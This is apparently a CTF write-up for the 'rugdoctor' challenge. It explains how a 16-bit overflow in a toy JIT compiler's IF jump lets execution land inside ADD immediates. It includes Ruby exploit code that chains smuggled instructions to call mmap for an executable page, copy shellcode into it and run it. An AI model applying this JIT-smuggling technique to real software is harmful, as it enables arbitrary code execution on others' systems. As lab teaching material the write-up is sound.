This is a write-up for rugdoctor, which is a JIT compiler with a 16-bit
integer overflow. The integer overflow allows you to jump to the middle of
other instructions, to run small bits of code in between other instructions.
As always, you can find copies of the binaries, containers, and full solution in our GitHub repo!
The language
I made a simple BASIC-like language that looks sorta like this:
let $a 10
loop $a
let $b 10
subv $b $a
add $b 1
print $b
endloop
exit 0
or:
let $b 3
loop $b
let $a 72
printchar $a
let $a 101
printchar $a
let $a 108
printchar $a
let $a 108
printchar $a
let $a 111
printchar $a
let $a 32
printchar $a
let $a 87
printchar $a
let $a 111
printchar $a
let $a 114
printchar $a
let $a 108
printchar $a
let $a 100
printchar $a
let $a 10
printchar $a
endloop
exit 0
Your code has access to four variables: $A, $B, $C, and $D.
And the instructions are:
LET $VAR <int32>- assign an immediate value to a variableLETV $VAR1 $VAR2- copy a variable to another variableADD $VAR <int32>- add an immediate value to a variableADDV $VAR1 $VAR2- add two variables together (result is stored in$VAR1)SUB $VAR <int32>- subtract an immediate value from a variableSUBV $VAR1 $VAR2- subtract$VAR2from$VAR1(result is stored in$VAR1)MUL $VAR <int32>- multiply a variable by an immediate valuePRINT $VAR- print the variable (as a number)PRINTCHAR $VAR- print the variable (as a character)LOOP $VAR ... ENDLOOP- loop$VARtimes, deducting 1 from$VAReach iteration (always executes once)IF $VAR ... ENDIF- only run the given block if$VARis non-zeroEXIT <int32>- exit with an immediate value as the exit code
The vulnerability
The instructions are converted to amd64 code using a big switch statement:
switch(command.keyword) {
case COMMAND_COMMENT:
break;
case COMMAND_LET:
// mov <reg>, <immediate>
add_u8(&state, 0x41);
add_u8(&state, 0xbc | reg_mask(&state, command.args.args_let.variable));
add_u32(&state, command.args.args_let.immediate);
break;
case COMMAND_LETV:
// mov <reg>, <immediate>
add_u8(&state, 0x4d);
add_u8(&state, 0x89);
add_u8(&state, 0xe4 |
(reg_mask(&state, command.args.args_letv.variable2) << 3)
| (reg_mask(&state, command.args.args_letv.variable1))
);
break;
case COMMAND_ADD:
add_u8(&state, 0x49);
add_u8(&state, 0x81);
add_u8(&state, 0xc4 | (reg_mask(&state, command.args.args_add.variable)));
add_u32(&state, command.args.args_add.immediate);
break;
case COMMAND_ADDV:
add_u8(&state, 0x4d);
add_u8(&state, 0x01);
add_u8(&state, 0xe4 |
(reg_mask(&state, command.args.args_addv.variable2) << 3)
| (reg_mask(&state, command.args.args_addv.variable1))
);
break;
// .........
The issue is in the if and loop operations:
case COMMAND_ENDIF:
if(state.in_if == 0) {
error(&state, "ENDIF without IF!");
}
state.in_if -= 1;
// Update the start of the if
int32_t if_jump = ((uint16_t)state.code_offset - (uint16_t)state.if_address[state.in_if] - 4);
memcpy(state.code_buffer + state.if_address[state.in_if], &if_jump, 4);
break;
By casting the jump to uint16_t, any jump longer than 65,536 bytes will wrap
around and jump to the wrong place.
The trick is, that place might be in the middle of another instruction
Also, importantly, those instructions are executable because it’s JIT code.
My exploit
I used a series of ADD instructions, since they permit a free-form 32-bit
immediate:
case COMMAND_ADD:
add_u8(&state, 0x49);
add_u8(&state, 0x81);
add_u8(&state, 0xc4 | (reg_mask(&state, command.args.args_add.variable)));
add_u32(&state, command.args.args_add.immediate);
break;
I set up the broken jump such that it jumps into the immediate of the first
ADD instruction. Then I use a series of 2-byte instructions followed by a very
short jump (eb03 which means “jump 3 bytes ahead”) to reach the next
instruction:
adds.concat([
# Padding
"\xcc\xcc", # This is jusssst skipped but required
# Set rdi to 0 (to allocate memory anywhere)
"\x6a\x00", # push 0
"\x5f\x90", # pop rdi / nop
# Set rsi to 1 (length - min size is a page, so it'll get rounded way up)
"\x6a\x01", # push 1
"\x5e\x90", # pop rsi
# Set rdx to 7 (prot = read | write | exec)
"\x6a\x07", # push 7
"\x5a\x90", # pop rdx
# Set r10 to 0x22 (flags = MAP_PRIVATE | MAP_ANONYMOUS)
"\x6a\x22", # push 0x22
"\x41\x5a", # pop r10
# Set r8 to -1 (fd)
"\x6a\xff", # push -1
"\x41\x58", # pop r8
# Set r9 to 0 (offset)
"\x6a\x00", # push 0
"\x41\x59", # pop r9
# Set rax to 9 (the sys_mmap number)
"\x6a\x09", # push 9
"\x58\x90", # pop rax
# syscall
"\x0f\x05",
# This map adds a `jmp $+3` after each instruction, which jumps to the next
].map { |c| "#{ c }\xeb\x03".unpack('V').pop })
That uses a syscall to allocate some memory and return it in rax.
Populating the memory with shellcode was a bit trickier.
We back up rax in a different register:
# This code preserves that buffer by storing it in rbx
adds << "\x50\x5b\xeb\x03".unpack('V').pop # push rax / pop rbx
Then for each byte of shellcode, we use a sorta complex write to write it to
memory. The problem is that I couldn’t find a way to do that in 2 bytes, so
I had to use 3 bytes. That means that I couldn’t use eb03 for the jumps, I had
to use much longer jumps (specifically, 49 bytes).
SHELLCODE.chars.each do |c|
# This instruction is 3 characters! That means we don't cleanly control the
# jmp and are stuck jmp'ing the distance of the next instruction (which,
# thankfully, hits code we control!)
# mov byte ptr [rax], c / jmp $+49
adds << "\xc6\x00#{ c }\xeb".unpack('V').pop
# This code is jumped over
adds.concat([1] * 10)
# The jmp $+49 hits the second byte of this, so we do a NOP and then our
# standard jump $+3
adds << "\x00\x90\xeb\x03".unpack('V').pop # <-- this runs, starting at the second byte
# This increments al - incrementing rax is too long, and incrementing eax
# breaks the pointer
#
# We know that mmap() will always return page-aligned memory, so it's safe to
# do this up to 255 times
adds << "\xfe\xc0\xeb\x03".unpack('V').pop
end
The 49-byte jump runs into the second byte of the 11th jump instruction.
Fortunately, we can use \x90 (nop), then \xeb\x03 to get back to the start
of a jump instruction. Then we increment al and do it again.
That creates a massive amount of code, but it works!
Finally, at the end, we call rbx (which is where we stored the rax starting
pointer):
# Finally, call rbx to give execution to our code
adds << "\xff\xd3\xeb\x03".unpack('V').pop
Then add enough extra ADD instructions to hit the overflow we want:
# This adds enough junk to the end to cause the overflow
adds.concat([1] * (NEEDED_ADDS - adds.length))
Then build the BASIC-like code:
# Build the code
code = <<~CODE
let $b 0
# This 'if' jumps too far, and ends up in the middle of an instruction
if $b
#{ adds.map { |add| " add $c #{ add }\n" }.join }
endif
exit 0
CODE
The resulting code sorta looks like:
let $b 0
# This 'if' jumps too far, and ends up in the middle of an instruction
if $b
add $c 1
add $c 1
add $c 1
add $c 1
add $c 1
add $c 1
add $c 1
add $c 65785036
add $c 65732714
add $c 65769567
add $c 65732970
add $c 65769566
add $c 65734506
# .............
add $c 1
add $c 1
add $c 1
add $c 1
add $c 1
add $c 1
add $c 65769472
add $c 65782014
add $c 3947364550
add $c 1
add $c 1
add $c 1
# ............
add $c 1
add $c 1
add $c 1
add $c 1
endif
exit 0
Which successfully runs any arbitrary shellcode!
